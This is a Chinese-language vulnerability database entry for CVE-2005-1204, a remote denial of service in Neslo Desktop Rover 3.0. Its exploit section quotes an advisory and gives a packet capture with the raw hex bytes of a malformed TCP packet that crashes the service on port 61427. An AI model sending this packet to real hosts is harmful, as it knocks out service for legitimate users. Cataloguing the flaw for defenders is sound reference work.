Desktop Rover未明安全漏洞-安全小百科

Desktop Rover未明安全漏洞

漏洞ID	1108692	漏洞类型	未知
发布时间	2005-04-20	更新时间	2005-05-02
CVE编号	CVE-2005-1204	CNNVD-ID	CNNVD-200505-473
漏洞平台	Multiple	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/25470
https://www.securityfocus.com/bid/90120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-473

|漏洞详情

DesktopRover3.0以及可能较早的版本，远程攻击者可以通过针对TCP端口61427的特制数据包来引起拒绝服务攻击，从而导致无效的内存访问。

|漏洞EXP

source: http://www.securityfocus.com/bid/13281/info

Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.

A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users. 

20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)

4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000

|受影响的产品

Nelso Software Desktop Rover 3.0

|参考资料

来源:MISC
链接:http://www.evilpacket.net/advisories/EP-000-0003.html
来源:SECUNIA
名称:15032
链接:http://secunia.com/advisories/15032
来源:BUGTRAQ
名称:20050420NesloDesktopRoverRemoteDoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111401676906915&w;=2

相关推荐: Oracle Database Server ORACLE.EXE Buffer Overflow Vulnerability

Oracle Database Server ORACLE.EXE Buffer Overflow Vulnerability 漏洞ID 1100840 漏洞类型 Boundary Condition Error 发布时间 2003-02-11 更新时间 20…

文章版权归作者所有，未经允许请勿转载。

THE END